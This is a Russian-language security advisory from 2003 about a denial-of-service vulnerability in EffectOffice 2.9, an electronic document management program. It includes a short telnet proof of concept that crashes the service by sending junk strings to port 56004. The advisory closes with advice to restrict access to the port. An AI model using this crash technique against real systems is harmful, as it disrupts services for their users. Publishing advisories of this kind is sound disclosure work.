Security Lab

DoS против EffectOffice

Дата публикации:21.11.2003
Дата изменения:17.10.2006
Всего просмотров:1240
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: EffectOffice 2.9

Описание: Уязвимость обнаружена в программе электронного документооборота EffectOffice. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Удаленный атакующий может послать специально сформированный запрос к 56004 порту, чтобы аварийно завершить работу программы. Возможно уязвимость может эксплуатироваться для выполнения произвольного кода на уязвимой системе.

Пример/Эксплоит:

hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa

^]
telnet>close
telnet>quit
hacker#
…………
Crash service

URL производителя: http://www.effectoffice.com/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к уязвимым портам только доверенным пользователям.

Уязвимость обнаружил D_BuG